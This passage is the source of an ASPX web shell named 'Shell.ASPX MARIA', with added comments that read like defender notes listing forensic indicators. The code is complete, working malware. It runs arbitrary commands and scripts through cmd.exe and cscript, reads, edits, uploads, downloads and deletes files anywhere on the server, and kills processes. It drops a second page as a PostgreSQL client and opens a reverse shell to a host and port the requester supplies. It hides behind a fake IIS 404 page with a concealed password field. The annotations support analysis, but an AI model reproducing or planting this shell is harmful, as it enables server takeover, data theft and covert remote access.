  343. String FileCreatePostgresSQLg = @"string TypeOutput = """"; string SQLView = """"; string querys = """"; String LOCALHOST = Request.Form[""host""] + Request.QueryString[""host""]; String USERNAME = Request.Form[""user""] + Request.QueryString[""user""]; String PASSWORD = Request.Form[""pass""] + Request.QueryString[""pass""]; String DATABASE = Request.Form[""database""] + Request.QueryString[""database""]; string MARIA = System.IO.Path.GetFileName(Request.Path); string conStr = ""Server=""+LOCALHOST+""; User Id=""+USERNAME+""; Password=""+PASSWORD+""; Database=""+DATABASE+"";""; NpgsqlConnection conn = new NpgsqlConnection(conStr); String Action = Request.QueryString[""Action""]; Action += Request.Form[""Action""]; if (Action == ""SelectTable"") {querys = ""SELECT * FROM "" + Request.QueryString[""Value""] + """"; TypeOutput = ""columns""; } else if (Action == ""ListTables"") {querys = ""SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%'""; TypeOutput = ""Tables""; } else if (!string.IsNullOrEmpty(Request.Form[""queryString""])) {querys = Request.Form[""queryString""]; TypeOutput = ""Query""; } else {querys = ""SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE'""; TypeOutput = ""Tables""; } NpgsqlCommand com = new NpgsqlCommand(querys, conn); NpgsqlDataAdapter ad = new NpgsqlDataAdapter(com); DataTable dt = new DataTable(); if(conn != null && conn.State == ConnectionState.Open) {conn.Close(); } else {conn.Open(); } ad.Fill(dt); NpgsqlDataReader dRead = com.ExecuteReader(); try {if (TypeOutput != ""Query"") {int CounterColumn = dRead.FieldCount; SQLView += ""<div class='footTable'><b><h2>Output</h2></b></div><table class='tabla'></tr>""; for (int i = 0; i < CounterColumn; i++) {SQLView += ""<th scope='col'>"" + dRead.GetName(i) + ""</th>""; } while (dRead.Read()) {String Field = """"; int dbFields = dRead.FieldCount; for (int i = 1; i < dbFields; i++) {Field += ""<td>"" + dRead[i] + ""</td>""; } if (TypeOutput == 
""Tables"") {SQLView += ""<tr><td><a href='?SQLProtocol=PostgreSQL&Action=SelectTable&host="" + LOCALHOST + ""&user="" + USERNAME + ""&pass="" + PASSWORD + ""&database="" + DATABASE + ""&Value="" + dRead[2] + ""' title='Table'>"" + dRead[2] + ""</td>"" + Field + ""</tr>""; } else {SQLView += ""<tr><td>"" + dRead[0] + ""</td>"" + Field + ""</tr>""; } Field = """"; } } else {SQLView += ""<div class='footTable'><b><h2>Output</h2></b>""; while (dRead.Read()) {SQLView += dRead.GetString(0); } SQLView += ""</code></div>""; } SQLView += ""</table><script>DivShowAndHidden('SQLConnection');</script><form method=POST action="" + MARIA + ""><input type=hidden name=PostgreSQL value=SQLite><input type=hidden name=host value="" + LOCALHOST + ""><input type=hidden name=database value="" + DATABASE + ""><input type=hidden name=user value="" + USERNAME + ""><input type=hidden name=pass value="" + PASSWORD + ""><textarea name=queryString style='width:100%;height:45px'></textarea ><input type=submit value=Execute><input type=submit name=action value=ListTables></form>"";Response.Write(SQLView); } catch (Exception e) {Response.Write(""<div class='alert'>"" + e.Message + ""</div>"");} finally{dRead.Close();dRead = null;conn.Close();conn = null;com.Dispose();com = null;}";
  // Inline stylesheet appended to the generated PostgreSQL client page (written
  // out by the WriteAllText call below) so the dropped page renders like the shell.
  344. String StyleHTML = @"<style type=""text/css""> * {font-family: Arial; font-size: 12px;} body {margin: 0px; background-color: white} pre {font-family: Courier New; background-color: black; margin: 60px;} .alert {color:Black;background-color:yellow; border: 3px solid yellow; font-size: 14px;} .timer {font-size: 22px; background-color: red; color: #FFFFFF; text-align: left;} .boxer {font-size: 15px; text-align: left;} .tabla {width: 100%; border: 3px solid #000;overflow-x:auto} .footTable {width: 100%; border: 3px solid #000;overflow-x:auto} .cmdPromp {background-color: black; color: white;border: 3px solid #000;} h2 {font-size: 14px; background-color: #006600; color: #FFFFFF; padding: 2px; } th {text-align: left; background-color: black; color: white} td {background-color: #d7d7d7;} a:link {background-color: #d7d7d7; color: black} a:visited {background-color: #d7d7d7;} a:hover {background-color: red;} a:active {background-color: #d7d7d7;} </style> ";
  // The PostgreSQL client is not executed in-process. It is written out as a
  // second ASPX page, "TEMP~.aspx", in CurrentFolder (which the caller selects
  // through the Directory query parameter), and then loaded in an iframe with
  // the database host, user, password and database name in the iframe URL.
  // Nothing in this code path deletes TEMP~.aspx afterwards.
  // Forensic indicators: a TEMP~.aspx file beside the shell, and web-server log
  // entries for TEMP~.aspx carrying host=/user=/pass=/database= parameters.
  // The empty-bodied `using` creates (or truncates) the file and releases the
  // handle at once; WriteAllText then reopens it to write the page source.
  345. using (System.IO.File.Create(@CurrentFolder + "TEMP~.aspx")) ;
  // "%" + ">" is concatenated at runtime, presumably to keep a literal "%>" out
  // of this page's own server code block.
  346. System.IO.File.WriteAllText(@CurrentFolder + "TEMP~.aspx", FileCreatePostgresSQLa + FileCreatePostgresSQLb + FileCreatePostgresSQLc + FileCreatePostgresSQLd + FileCreatePostgresSQLe + FileCreatePostgresSQLf + FileCreatePostgresSQLg + "%" + ">" + StyleHTML);
  // Credentials travel in the iframe src query string (and so into server logs,
  // referrers and browser history).
  347. SQLView = "<script>DivShowAndHidden('SQLConnection')</script><iframe width=100% height=100% scrolling=yes seamless=yes src=TEMP~.aspx?&host=" + LOCALHOST + "&user=" + USERNAME + "&pass=" + PASSWORD + "&database=" + DATABASE + "></iframe>";
  348. }
  349. catch (Exception e)
  350. {
  351. Response.Write("<div class='alert'>" + e.Message + "</div>");
  352. }
  353. }
  354.  
  355. }
  356.  
  357.  
  358. // List directories and files.
  // Builds the HTML rows for the file browser from CurrentFolder, which is used
  // exactly as received (derived from the Directory query parameter, no
  // canonicalisation or allow-list). GetDirectories()/GetFiles() on a missing
  // or inaccessible path throw, and there is no try/catch around this section,
  // so such requests presumably surface as an unhandled page error.
  359. DirectoryInfo di = new DirectoryInfo(CurrentFolder);
  360.  
  // Parent directory for the "BACK DIRECTORY" row; note it is emitted into the
  // href below without UrlEncode, unlike every other link in this section.
  361. String lastdirectory = Path.GetFullPath(Path.Combine(CurrentFolder, @"..\"));
  362.  
  363. Folders += string.Format("<tr><td><center><b>BACK DIRECTORY</b></center></a></td><td><a href='?Directory={0}'>..</a></td><td>Directory</td><td></td><td></td><td></td></tr>", lastdirectory);
  364.  
  // One row per sub-directory: a [X] link to ?DeleteDir=<path> and a link that
  // navigates into the directory.
  365. foreach (DirectoryInfo curdir in di.GetDirectories())
  366. {
  367. string fstr = string.Format("<a href='?Directory={0}'>{1}</a>", HttpUtility.UrlEncode(CurrentFolder + "/" + curdir.Name), HttpUtility.HtmlEncode(curdir.Name));
  368. Folders += string.Format("<tr><td><center><b><a href=?DeleteDir="+HttpUtility.UrlEncode(CurrentFolder+ "/" + curdir.Name)+">[X]</b></center></a></td><td>{0}</td><td>Directory</td><td></td><td></td><td></td></tr>", fstr);
  369. //attributesOfFolder="";
  370. }
  // One row per file: attribute flags (H for hidden, R for read-only, RW
  // otherwise), a View link, and per-file Delete / Edit (?get=) / Download /
  // Rename actions, each carrying the full path as a query parameter.
  371. foreach (FileInfo curfile in di.GetFiles())
  372. {
  373. FileAttributes attributes = File.GetAttributes(@curfile.FullName);
  374. if ((attributes & FileAttributes.Hidden) == FileAttributes.Hidden) {attributesOfFiles+="<a title='Hidden'>H</a>";}
  375. if ((attributes & FileAttributes.ReadOnly) == FileAttributes.ReadOnly) {attributesOfFiles+="<a title='Read'>R</a>";}else{attributesOfFiles+="<a title='Read'>R</a><a title='Write'>W</a>";}
  376. string fstr = string.Format("<a href='?View={0}' target='_blank'>{1}</a>", HttpUtility.UrlEncode(CurrentFolder + "/" + curfile.Name), HttpUtility.HtmlEncode(curfile.Name));
  377. string astr = string.Format("<b><i><center><a href='javascript:deletefile(\"{1}\")' title='Delete'>[X]</a> <a href='?Directory={0}&get={1}' title='Edict'>[E]</a> <a href='?Directory={0}&Download={1}' title='Download'>[D]</a> <a href='javascript:PopupBoxRenameFile(\"{0}\",\"{1}\");' title='Rename'>[R]</a></center></b></i>", HttpUtility.UrlEncode(CurrentFolder), HttpUtility.UrlEncode(CurrentFolder + "/" + curfile.Name));
  378. string Extension=HttpUtility.UrlEncode(curfile.Extension);
  // curfile.Length is the size in bytes; the "Kb" label in the cell is not a
  // conversion.
  379. Files += string.Format("<tr><td>{2}</td><td>{0}</td><td>{3} File</td><td>"+attributesOfFiles+"</td><td>"+curfile.CreationTime+"</td><td>{1:d} Kb</td></tr>", fstr, curfile.Length, astr, Extension);
  // Reset the per-file attribute string for the next iteration.
  380. attributesOfFiles="";
  381. }
  382.  
  383. // Console CMD.
  // Command execution: whatever was posted in the txtCmdIn text box is passed
  // verbatim to "cmd.exe /c" and runs under the web worker process's identity,
  // with CurrentFolder as the working directory. stdout followed by stderr is
  // captured into lblCmdOut (rendered with Mode="Encode" in the markup below).
  // Detection: cmd.exe started as a child of the web server worker process with
  // "/c" arguments is the host-level indicator of this feature being used.
  384. if (txtCmdIn.Text.Length > 0)
  385. {
  386. Process p = new Process();
  387. p.StartInfo.CreateNoWindow = true;
  388. p.StartInfo.FileName = "cmd.exe";
  389. p.StartInfo.Arguments = "/c " + txtCmdIn.Text;
  390. p.StartInfo.UseShellExecute = false;
  391. p.StartInfo.RedirectStandardOutput = true;
  392. p.StartInfo.RedirectStandardError = true;
  393. p.StartInfo.WorkingDirectory = CurrentFolder;
  394. p.Start();
  // Reads stdout to end before touching stderr; a child that fills the stderr
  // pipe first can block here (the documented Process redirection caveat), and
  // nothing in this section guards against that. The Process object is not
  // disposed.
  395. lblCmdOut.Text = p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd();
  396. txtCmdIn.Text = "";
  397. }
  398.  
  399. // Searcher.
  // File search over the whole tree under CurrentFolder (SearchOption.AllDirectories).
  // Three optional criteria, each doing its own full recursive walk:
  //  - QueryExtentionSearch: exact, case-sensitive match on file.Extension;
  //  - QueryNameSearch:      exact, case-sensitive match on file.Name;
  //  - QueryStringSearch:    the submitted text is compiled as a .NET Regex
  //    (IgnoreCase | IgnorePatternWhitespace, no match timeout) and every file
  //    is read line by line. Matches report the full path and line number.
  // Results are returned in the page, so the response size grows with matches.
  400. if(!string.IsNullOrEmpty(Request.Form["Searcher"])){
  401. string startFolder = @CurrentFolder;
  402. ResultSearchOuput+="<script>DivShowAndHidden('Searcher');</script>";
  403. System.IO.DirectoryInfo dir = new System.IO.DirectoryInfo(startFolder);
  404. try{
  405. if(!string.IsNullOrEmpty(Request.Form["QueryExtentionSearch"])){foreach (System.IO.FileInfo file in dir.GetFiles("*.*", System.IO.SearchOption.AllDirectories)){if(file.Extension == Request.Form["QueryExtentionSearch"]){ResultSearchOuput+="<br> Namefile : <b>"+file.FullName+"</b> Creation Time: <b><font color='green'>"+file.CreationTime+"</b></font>";}}}
  406. if(!string.IsNullOrEmpty(Request.Form["QueryNameSearch"])){foreach (System.IO.FileInfo file in dir.GetFiles("*.*", System.IO.SearchOption.AllDirectories)){if(file.Name == Request.Form["QueryNameSearch"]){ResultSearchOuput+="<br> Namefile : <b>"+file.FullName+"</b> Creation Time: <b><font color='green'>"+file.CreationTime+"</b></font>";}}}
  407. if(!string.IsNullOrEmpty(Request.Form["QueryStringSearch"])){
  408. foreach (System.IO.FileInfo fi in dir.GetFiles("*.*", System.IO.SearchOption.AllDirectories)) {
  409. int counte=0;
  // The StreamReader is not in a using block: it is only closed at the end of
  // the normal path, so if reading throws (locked or unreadable file) the
  // handle stays open until the reader is finalised and the remaining files
  // are skipped via the catch below.
  410. string line; System.IO.StreamReader filetoRead = new System.IO.StreamReader(fi.FullName);
  411. String Patron=Request.Form["QueryStringSearch"];
  412. Regex regex = new Regex(Patron, RegexOptions.IgnoreCase | RegexOptions.IgnorePatternWhitespace);
  413. while((line = filetoRead.ReadLine()) != null) {counte+=1;if (regex.Match(line).Success == true){ResultSearchOuput+="<br> Namefile : <b>"+fi.FullName+"</b> Creation Time: <b><font color='green'>"+fi.CreationTime+"</font> Line: "+counte+"</b>";}}filetoRead.Close();}}
  414. }catch(Exception e){Response.Write("<div class='alert'>SHELL.ASPX Message: "+e.Message+"</div>");}
  // 67 is the length of the initial "<h1>Result Found</h1>" header (21 chars)
  // plus the DivShowAndHidden script appended above (46 chars), i.e. the
  // buffer when no result line was added.
  415. if (ResultSearchOuput.Length == 67){ResultSearchOuput="<script>DivShowAndHidden('Searcher');</script><div class='alert'>SHELL.ASPX Message: No Match </div>";}
  416. }
  417.  
  418. // Host fingerprinting for the banner.
  // NameMachine and VersionOS are emitted into the clock script in the markup
  // below, so every rendered GUI response discloses the server's host name and
  // OS version. ProcessorCountMachine and UserNameMachine are captured but not
  // referenced in the visible markup. Environment.UserName is, presumably, the
  // application pool identity the worker runs as (unless impersonation is on).
  419. String NameMachine=Environment.MachineName.ToString();
  420. String VersionOS=Environment.OSVersion.ToString();
  421. String ProcessorCountMachine=Environment.ProcessorCount.ToString();
  422. String UserNameMachine=Environment.UserName.ToString();
  423.  
  424. // Detect scripting runtimes installed on the system.
  // Only these fixed paths on the system drive (MainDrive) are probed; an
  // interpreter installed anywhere else is not reported. The result is shown
  // in the "Binaries detected" row of the GUI.
  425. if (File.Exists(MainDrive+@"python27\python.exe")){Binaries+="<b><font color=green>Python 2.7</font></b> ";}
  426. if (File.Exists(MainDrive+@"python32\python.exe")){Binaries+="<b><font color=green>Python 3.2</font></b> ";}
  427. if (File.Exists(MainDrive+@"perl\bin\perl.exe")){Binaries+="<b><font color=blue>Perl</font></b> ";}
  428. if (File.Exists(MainDrive+@"ruby\ruby.exe")){Binaries+="<b><font color=red>Ruby</font></b> ";}
  429. if (File.Exists(MainDrive+@"ProgramData\Oracle\Java\javapath\java.exe")){Binaries+="<b><font color=coral>Java</font></b> ";}
  430. if (Binaries == ""){Binaries="No Binaries Detected...";}
  431.  
  432. // Run scripts.
  // The posted "content" is written to scriptToRun.cmd (language=batch) or
  // scriptToRun.vbs (language=vbs) in CurrentFolder, executed with
  // "cmd.exe /c <path>" or "cscript <path>", its stdout+stderr captured into
  // lblCmdOut, and the file deleted. The on-disk artefact is therefore
  // short-lived: look for it in file-system journaling or audit logs rather
  // than on disk. If Process.Start throws (no try/catch here) the delete on the
  // last line is never reached and the script file is left behind.
  // Any other "language" value leaves both strings empty, so an empty file
  // name would be handed to Process.Start (presumably throwing).
  433. if(!string.IsNullOrEmpty(Request.Form["language"])){
  434. String ExtensionFile="";String BinLAN="";
  435. if(Request.Form["language"] == "batch"){ExtensionFile=".cmd";BinLAN="cmd.exe";}
  436. if(Request.Form["language"] == "vbs"){ExtensionFile=".vbs";BinLAN="cscript ";}
  // Empty-bodied using: create/truncate the file and release the handle.
  437. using (System.IO.File.Create(@CurrentFolder+"scriptToRun"+ExtensionFile));
  438. System.IO.File.WriteAllText(@CurrentFolder+"scriptToRun"+ExtensionFile, Request.Form["content"]);
  439. Process p = new Process();
  440. p.StartInfo.CreateNoWindow = true;
  441. p.StartInfo.FileName = BinLAN;
  442. if(BinLAN=="cmd.exe"){p.StartInfo.Arguments = "/c "+@CurrentFolder+"scriptToRun"+ExtensionFile;}
  443. else{p.StartInfo.Arguments = @CurrentFolder+"scriptToRun"+ExtensionFile;}
  444. p.StartInfo.UseShellExecute = false;
  445. p.StartInfo.RedirectStandardOutput = true;
  446. p.StartInfo.RedirectStandardError = true;
  447. p.StartInfo.WorkingDirectory = CurrentFolder;
  448. p.Start();
  // Same sequential ReadToEnd pattern as the console handler: can block if the
  // child fills the stderr pipe first.
  449. lblCmdOut.Text = p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd();
  450. txtCmdIn.Text = "";
  451. File.Delete(@CurrentFolder+"scriptToRun"+ExtensionFile);
  452. }
  453.  
  454. // Process management.
  // Lists every process visible to the worker and optionally kills by NAME:
  // when the "action" query parameter is present (any value; the "kill" value
  // in the generated link is never checked) and "process" equals a process
  // name, Kill() is attempted on every process with that name, not on a single
  // PID. Success or the exception message is written inline. `sb` is declared
  // but never used.
  455. System.Text.StringBuilder sb = new StringBuilder();
  456. System.Diagnostics.Process[] processes = System.Diagnostics.Process.GetProcesses();
  457. String VTTable="";
  458. foreach (System.Diagnostics.Process process in processes)
  459. {
  460. if(Request.QueryString["action"] != null){
  461. if(Request.QueryString["process"] == process.ProcessName){
  462. try{
  463. process.Kill();
  464. Response.Write("<div class='alert'>SHELL.ASPX Message: Process Killed</div>");
  465. }catch (Exception e){
  466. Response.Write("<div class='alert'>SHELL.ASPX Message: "+e.Message+"</div>");
  467. }}}
  // Third column is WorkingSet64 / 1000 (memory, roughly KB), although the
  // table heading in the markup below labels it "PID".
  468. VTTable += string.Format("<tr><td><center><a href='?process={0}&action=kill' title='kill process'>[Kill]</a></td><td>{0}</td><td>{1}</td></tr>",process.ProcessName,process.WorkingSet64 / 1000);
  469. //Response.Write(VTTable);
  470. }
  471.  
  472. // Reverse shell trigger.
  // Fires when form field "a" is non-empty; the remote host is taken from form
  // field "u" and the port from "p", both unvalidated. StartShell (class
  // `start`, defined in the <script runat="server"> block below) connects
  // outbound from the worker process and loops until the remote side ends the
  // session, so the thread serving this request is held for the life of the
  // shell. The alert() written first is part of the same buffered response, so
  // it is presumably not delivered until StartShell returns.
  // Detection: outbound TCP from the web worker process to an arbitrary
  // host/port, and a long-running POST carrying the a/u/p fields.
  473. if (!string.IsNullOrEmpty(Request.Form["a"]))
  474. {
  475. try
  476. {
  477. start P = new start();
  478. String Hostname = Request.Form["u"];
  479. String PortListening = Request.Form["p"];
  480. Response.Write("<script>alert('SHELL.ASPX: Connecting with Host Remote ["+Hostname+":"+PortListening+"]')</script>");
  // StartShell swallows connection failures itself (see the class), so most
  // errors never reach this catch.
  481. P.StartShell(Hostname, PortListening);
  482. }
  483. catch (Exception e)
  484. {
  485. Response.Write("<div class='alert'>SHELL.ASPX Message: " + e.Message + "</div>");
  486.  
  487. }
  488. }
  489.  
  490. // General file operations (query/form driven).
  // Every path below is taken verbatim from the request with no
  // canonicalisation, allow-listing or web-root confinement, so each action
  // reaches any path the worker identity can access. Parameter names to look
  // for in web-server logs: Rename+file, Download, get, GetEdict+FileName (POST),
  // Delete, View, DeleteDir, NewFolder, NewFile, plus multipart uploads to this page.
  // Response.Redirect(MARIA) (MARIA is this page's own file name) ends the
  // response by raising ThreadAbortException; that is caught by the catch at
  // the bottom (which writes the message) and then re-raised by the runtime, as
  // is usual for Response.Redirect inside a catch-all.
  491. try{
  492. // Rename: copy to CurrentFolder + <Rename> then delete the original, so it
  // also moves files across directories. File.Copy is called without the
  // overwrite flag, so an existing destination makes it throw and the source
  // is left in place.
  493. if (!string.IsNullOrEmpty(Request.QueryString["Rename"])){File.Copy(Request.QueryString["file"],@CurrentFolder+Request.QueryString["Rename"]);File.Delete(Request.QueryString["file"]);Response.Redirect (MARIA);}
  494.  
  495. // Download: streams the named file as an attachment; the Content-Disposition
  // filename is the raw request value (a full path).
  496. if (!string.IsNullOrEmpty(Request.QueryString["Download"])){Response.Clear();Response.ContentType = "application/octet-stream";Response.AddHeader("Content-Disposition", "attachment; filename="+Request.QueryString["Download"]);Response.WriteFile(Request.QueryString["Download"]);Response.Flush();Response.End();}
  497.  
  498. // Editor: writes the file's content into a textarea (unencoded) together
  // with a hidden GetEdict/FileName pair, then ends the response.
  499. if (!string.IsNullOrEmpty(Request.QueryString["get"])){Response.Write(" <title>Shell.ASPX MARIA - Editor</title><div style='font-size: 20px; background-color: red; color: #FFFFFF; text-align: left;'>Shell.APSX MARIA - Editor</h1><form method='POST' action='?Run'> <textarea name='content' style='height: 100%; width: 100%;'>");Response.WriteFile(Request.QueryString["get"]);Response.Write(" </textarea><input type='hidden' name='GetEdict' value='true'><input type='hidden' name='FileName' value='"+Request.QueryString["get"]+"'><input type='submit' value='Save'>");Response.End();}
  500.  
  501. // Save edited file: the delete happens BEFORE the inner try, so a failure in
  // the recreate step leaves the file gone. Slashes are normalised to
  // backslashes only here, not in the other actions.
  502. if(!string.IsNullOrEmpty(Request.Form["GetEdict"])){File.Delete(Request.Form["FileName"]);try{String FileToEdict = Request.Form["FileName"];FileToEdict = FileToEdict.Replace("//","\\").Replace("/","\\");using (System.IO.File.Create(@FileToEdict));System.IO.File.WriteAllText(@FileToEdict, Request.Form["content"]);Response.Write("<div class='alert'>SHELL.ASPX Message: File Edicted</div>");}catch (Exception e) {Response.Write("<div class='alert'>SHELL.ASPX Message: "+e.Message+"</div>");}}
  503.  
  504. // Delete file.
  505. if (!string.IsNullOrEmpty(Request.QueryString["Delete"])){File.Delete(Request.QueryString["Delete"]);Response.Redirect (MARIA);}
  506.  
  507. // View file: same as the editor but read-only (no save form).
  508. if (!string.IsNullOrEmpty(Request.QueryString["View"])){Response.Write("<title>Shell.ASPX MARIA - View</title><div style='font-size: 20px; background-color: red; color: #FFFFFF; text-align: left;'>Shell.APSX MARIA - View</h1> <textarea name='content' style='height: 100%; width: 100%;'>");Response.WriteFile(Request.QueryString["View"]);Response.Write(" </textarea>");Response.End();}
  509.  
  510. // Delete folder: single-argument Directory.Delete, i.e. non-recursive; a
  // non-empty directory makes it throw.
  511. if (!string.IsNullOrEmpty(Request.QueryString["DeleteDir"])){System.IO.Directory.Delete(Request.QueryString["DeleteDir"]);Response.Redirect (MARIA);}
  512.  
  513. // Make new folder under CurrentFolder.
  514. if (!string.IsNullOrEmpty(Request.QueryString["NewFolder"])){System.IO.Directory.CreateDirectory(@CurrentFolder+Request.QueryString["NewFolder"]);Response.Redirect (MARIA);}
  515.  
  516. // Make new (empty) file under CurrentFolder.
  517. if (!string.IsNullOrEmpty(Request.QueryString["NewFile"])){using (System.IO.File.Create(@CurrentFolder+Request.QueryString["NewFile"]));Response.Redirect (MARIA); }
  518.  
  519. // Upload: saved into CurrentFolder under the client-supplied name.
  520. if(flUp.HasFile)
  521. {
  522. string fileName = flUp.FileName;
  523. int splitAt = flUp.FileName.LastIndexOfAny(new char[] { '/', '\\' });
  524. if (splitAt >= 0)
  // Substring(splitAt) keeps the separator itself, so fileName starts with
  // '/' or '\' when the client sent a path; the extra separator is harmless on
  // Windows paths.
  525. fileName = flUp.FileName.Substring(splitAt);
  526. flUp.SaveAs(CurrentFolder + "/" + fileName);
  527. Response.Redirect (MARIA);
  528. }
  529. }catch(Exception e){Response.Write("<div class='alert'>SHELL.ASPX Message: "+e.Message+"</div>");}
  530.  
  531. %>
  532. <script runat="server">
  533.  
  // Reverse-shell helper used by the "Shell Reverse" handler in the page code
  // above. The worker process connects OUT to the given host/port, spawns
  // cmd.exe with stdin/stdout redirected, forwards every line received on the
  // socket to cmd.exe's stdin and streams cmd.exe's stdout lines back to the
  // socket. Defender notes, all taken from the code in this class:
  //  - the connection is outbound from the web server worker process, so
  //    egress from that process to arbitrary hosts/ports is the network signal;
  //  - StartShell never returns while the session is alive (while (true)), so
  //    the HTTP request that triggered it stays open for the whole session;
  //  - a received line containing "terminate" leads to Environment.Exit, which
  //    ends the entire worker process, not just this page;
  //  - cmd.exe's stderr is redirected but never read, so error output is not
  //    relayed (and, presumably, could block the child if its buffer fills).
  534. public class start
  535. {
  536. TcpClient tcpClient;
  537. NetworkStream networkStream;
  538. StreamWriter streamWriter;
  539. StreamReader streamReader;
  540. Process processCmd;
  // Accumulates the current line(s) received from the socket before they are
  // written to cmd.exe.
  541. StringBuilder strInput;
  542.  
  // IPR: remote host name/IP. PORR: port as a string (Convert.ToInt32).
  // Connection and port-parse failures are swallowed by the first catch and the
  // method simply returns, so the HTTP caller gets no error for them.
  543. public void StartShell(string IPR, string PORR)
  544. {
  545.  
  546. tcpClient = new TcpClient();
  547. strInput = new StringBuilder();
  548.  
  549. try
  550. {
  551. int PORT = Convert.ToInt32(PORR);
  552. tcpClient.Connect(IPR, PORT);
  553. networkStream = tcpClient.GetStream();
  554. streamReader = new StreamReader(networkStream);
  555. streamWriter = new StreamWriter(networkStream);
  556. }
  557. catch (Exception err) { return; }
  558.  
  // Interactive cmd.exe: stdin is written from the socket below; stdout is
  // delivered line by line to CmdOutputDataHandler via BeginOutputReadLine.
  559. processCmd = new Process();
  560. processCmd.StartInfo.FileName = "cmd.exe";
  561. processCmd.StartInfo.CreateNoWindow = true;
  562. processCmd.StartInfo.UseShellExecute = false;
  563. processCmd.StartInfo.RedirectStandardOutput = true;
  564. processCmd.StartInfo.RedirectStandardInput = true;
  565. processCmd.StartInfo.RedirectStandardError = true;
  566. processCmd.OutputDataReceived += new
  567. DataReceivedEventHandler(CmdOutputDataHandler);
  568. processCmd.Start();
  569. processCmd.BeginOutputReadLine();
  570.  
  // Session loop. ReadLine returns null once the remote side closes;
  // Append(null) is a no-op, so after a disconnect the loop keeps writing bare
  // newlines to cmd.exe's stdin (presumably spinning) until that write throws.
  // Both keyword checks are substring matches on the pending buffer: any line
  // containing "terminate" kills the worker process via StopServer, and any
  // line containing "exit" ends the session via the ArgumentException path.
  571. while (true)
  572. {
  573. try
  574. {
  575. strInput.Append(streamReader.ReadLine());
  576. strInput.Append("\n");
  577. if(strInput.ToString().LastIndexOf(
  578. "terminate") >= 0) StopServer();
  579. if(strInput.ToString().LastIndexOf(
  580. "exit") >= 0) throw new ArgumentException();
  581. processCmd.StandardInput.WriteLine(strInput);
  582. strInput.Remove(0, strInput.Length);
  583. }
  584. catch (Exception err)
  585. {
  586. Cleanup();
  587. break;
  588. }
  589. }
  590. }
  591.  
  // Kills cmd.exe (failure ignored) and closes the reader, writer and network
  // stream. The TcpClient itself is not closed explicitly here.
  592. private void Cleanup()
  593. {
  594. try { processCmd.Kill(); } catch (Exception err) { };
  595. streamReader.Close();
  596. streamWriter.Close();
  597. networkStream.Close();
  598. }
  599.  
  // "terminate" handler: tears the session down and then calls
  // Environment.Exit, which terminates the whole process hosting this page
  // (the web worker), an observable crash/restart of the application pool.
  600. private void StopServer()
  601. {
  602. Cleanup();
  603. System.Environment.Exit(System.Environment.ExitCode);
  604. }
  605.  
  // Invoked by Process for each stdout line of cmd.exe (asynchronous read
  // started by BeginOutputReadLine); relays the line to the socket and flushes.
  // Socket write errors are swallowed.
  606. private void CmdOutputDataHandler(object sendingProcess,
  607. DataReceivedEventArgs outLine)
  608. {
  609. StringBuilder strOutput = new StringBuilder();
  610. if(!String.IsNullOrEmpty(outLine.Data))
  611. {
  612. try
  613. {
  614. strOutput.Append(outLine.Data);
  615. streamWriter.WriteLine(strOutput);
  616. streamWriter.Flush();
  617. }
  618. catch (Exception err) { }
  619. }
  620. }
  621. }//end class start
  622. </script>
  623.  
  624. <!-- Shell MARIA / GUI -->
  625. <%
  626. // Access gate for the GUI.
  // Grants access when the request carries a cookie named "UserSettings" whose
  // raw value is "Error=<PASSWORG_SHELL>", or, only when no such cookie is
  // present at all, when form field "error" equals the password; in that case
  // the cookie is issued for one day (HttpOnly/Secure are not set here).
  // A cookie with the wrong value is NOT a fallthrough to the form check.
  // Indicators: a "UserSettings=Error=..." cookie, and POSTs with an "error"
  // field to a page that otherwise answers with a 404-looking body.
  // NOTE(review): in page order this check sits after the code block that
  // performs the command/file/process actions, so it presumably gates only
  // the rendered GUI, not the actions themselves — confirm against the full
  // page before treating the password as having limited what a request could do.
  627. String REQCOOKIE = "NOACCESS";
  628. if (Request.Cookies["UserSettings"] != null)
  629. {
  630. HttpCookie COOK = Request.Cookies.Get("UserSettings");
  // Plain string equality against the hard-coded password from the page header.
  631. if (COOK.Value == "Error="+PASSWORG_SHELL)
  632. {
  633. REQCOOKIE = "GRANTED";
  634. }
  635. }
  636. else
  637. {
  638. if (Request.Form["error"] == PASSWORG_SHELL)
  639. {
  // Sub-value "Error" makes the cookie's serialised value "Error=<password>",
  // which is what the branch above compares against.
  640. HttpCookie myCookie = new HttpCookie("UserSettings");
  641. myCookie["Error"] = PASSWORG_SHELL;
  642. myCookie.Expires = DateTime.Now.AddDays(1d);
  643. Response.Cookies.Add(myCookie);
  644. REQCOOKIE = "GRANTED";
  645. }
  646. }
  647.  
  648. if (REQCOOKIE == "NOACCESS")
  649. {
  // Decoy served to unauthenticated visitors: a body styled like the IIS
  // "404 - File or directory not found." error page, with a borderless,
  // unlabelled password field embedded in the heading. Note the HTTP status is
  // not changed here, so the page is returned as a normal 200 response, and a
  // genuine IIS 404 page contains no <form>; both distinguish it from the real
  // thing in logs and captures.
  650. String SERVERERROR = @"
  651. <html>
  652. <head>
  653. <meta http-equiv=Content-Type content='text/html; charset=iso-8859-1'/>
  654. <title>404 - File or directory not found.</title>
  655. <style type=text/css>
  656. <!--
  657. body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
  658. fieldset{padding:0 15px 10px 15px;}
  659. h1{font-size:2.4em;margin:0;color:#FFF;}
  660. h2{font-size:1.7em;margin:0;color:#CC0000;}
  661. h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
  662. #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:'trebuchet MS', Verdana, sans-serif;color:#FFF;
  663. background-color:#555555;}
  664. #content{margin:0 0 0 2%;position:relative;}
  665. .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
  666. -->
  667. </style>
  668. </head>
  669. <body>
  670. <div id=header><h1>Server Error</h1></div>
  671. <div id=content>
  672. <div class=content-container><fieldset>
  673. <h2>404 - File or directory not found.<form method=post><input style='border: 0px;cursor: default;padding: inherit;' type=password name=error></form></h2>
  674. <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
  675. </fieldset></div>
  676. </div>
  677. </body>
  678. </html>";
  679. Response.Write(SERVERERROR);
  680. }else{
  681. %>
  682. <html>
  683. <head>
  684. <title>SHELL</title>
  685. </head>
  686. <body>
  687. <style type="text/css">
  688. * {font-family: Arial; font-size: 12px;}
